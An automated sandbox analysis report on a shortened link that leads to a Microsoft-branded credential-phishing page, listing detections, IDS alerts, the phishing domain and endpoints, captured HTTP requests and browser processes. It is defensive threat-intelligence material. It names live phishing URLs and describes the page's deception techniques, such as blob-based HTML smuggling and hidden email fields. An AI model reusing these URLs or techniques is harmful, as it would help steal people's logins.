Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t.co/nq9BYOxCg9

Overview

General Information

Sample URL:https://t.co/nq9BYOxCg9
Analysis ID:1564181
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected HtmlPhish75
Found HTTP page in a blob
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,12504391894528968252,14865817341340154054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6720 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.co/nq9BYOxCg9" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_64JoeSecurity_HtmlPhish_75Yara detected HtmlPhish_75Joe Security
    SourceRuleDescriptionAuthorStrings
    0.4.id.script.csvJoeSecurity_HtmlPhish_75Yara detected HtmlPhish_75Joe Security
      2.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        2.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T23:06:45.244863+010028580171Successful Credential Theft Detected172.67.157.254443192.168.2.1649719TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-27T23:07:48.269538+010028122371Successful Credential Theft Detected192.168.2.1649739172.67.157.254443TCP
          2024-11-27T23:08:01.875708+010028122371Successful Credential Theft Detected192.168.2.1649741172.67.157.254443TCP
          2024-11-27T23:08:31.310693+010028122371Successful Credential Theft Detected192.168.2.1649744172.67.157.254443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://t.co/nq9BYOxCg9Avira URL Cloud: detection malicious, Label: malware
          Source: https://flowerrainoover.com/.dlk/send.phpAvira URL Cloud: Label: phishing
          Source: https://flowerrainoover.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsAvira URL Cloud: Label: phishing

          Phishing

          barindex
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'flowerrainoover.com' does not match the legitimate domain 'microsoft.com'., The URL contains a UUID which is unusual for legitimate Microsoft URLs., The domain 'flowerrainoover.com' is not associated with Microsoft and appears suspicious., The presence of an email input field could be used for phishing purposes. DOM: 2.2.pages.csv
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1' does not match the legitimate domain 'microsoft.com'., The domain 'flowerrainoover.com' is not associated with Microsoft and appears suspicious., The use of a 'blob:' URL scheme is unusual for legitimate brand login pages and can be indicative of phishing., Presence of a password input field on a non-legitimate domain increases the risk of phishing. DOM: 2.3.pages.csv
          Source: Yara matchFile source: 2.3.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: Yara matchFile source: 0.4.id.script.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_64, type: DROPPED
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1DOM page: Blob-based
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: it@STEINBORN.COM
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: Number of links: 0
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://flowerrainoover.com/.dlk/inv.htmlHTTP Parser: Base64 decoded: 1732745201.000000
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: Title: Secure File Access does not match URL
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: Invalid link: Privacy & Cookies
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: Invalid link: Privacy & Cookies
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: <input type="password" .../> found
          Source: https://flowerrainoover.com/.dlk/inv.htmlHTTP Parser: No favicon
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: No favicon
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: No favicon
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: No <meta name="author".. found
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: No <meta name="author".. found
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: No <meta name="copyright".. found
          Source: blob:https://flowerrainoover.com/7b04a283-dde3-4b69-88f1-0f6ebe8b4fc1HTTP Parser: No <meta name="copyright".. found
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49733 version: TLS 1.2

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2858017 - Severity 1 - ETPRO PHISHING HTML Smuggling Credential Phish Landing Page 2024-08-23 : 172.67.157.254:443 -> 192.168.2.16:49719
          Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.16:49739 -> 172.67.157.254:443
          Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.16:49741 -> 172.67.157.254:443
          Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.16:49744 -> 172.67.157.254:443
          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: global trafficHTTP traffic detected: GET /nq9BYOxCg9 HTTP/1.1Host: t.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /.dlk/inv.html HTTP/1.1Host: flowerrainoover.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://t.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /.dlk/inv.html HTTP/1.1Host: flowerrainoover.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://flowerrainoover.com/.dlk/inv.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: flowerrainoover.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://flowerrainoover.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=eA277dL4f+3cxax&MD=RxVDfndl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: flowerrainoover.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=eA277dL4f+3cxax&MD=RxVDfndl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficDNS traffic detected: DNS query: t.co
          Source: global trafficDNS traffic detected: DNS query: flowerrainoover.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
          Source: unknownHTTP traffic detected: POST /.dlk/inv.html HTTP/1.1Host: flowerrainoover.comConnection: keep-aliveContent-Length: 22sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Requested-TimeStamp-Expire: sec-ch-ua-mobile: ?0X-Requested-TimeStamp-Combination: X-Requested-Type-Combination: GETContent-type: application/x-www-form-urlencodedX-Requested-Type: GETUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36B0kWKUtIuUoeYhzNrJt3uJISRw: 46353150X-Requested-TimeStamp: X-Requested-with: XMLHttpRequestsec-ch-ua-platform: "Windows"Accept: */*Origin: https://flowerrainoover.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://flowerrainoover.com/.dlk/inv.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0
          Source: chromecache_64.1.drString found in binary or memory: https://code.jquery.com/jquery-3.6.0.min.js
          Source: chromecache_63.1.drString found in binary or memory: https://flowerrainoover.com/.dlk/inv.html
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49733 version: TLS 1.2
          Source: classification engineClassification label: mal92.phis.win@18/19@16/9
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,12504391894528968252,14865817341340154054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.co/nq9BYOxCg9"
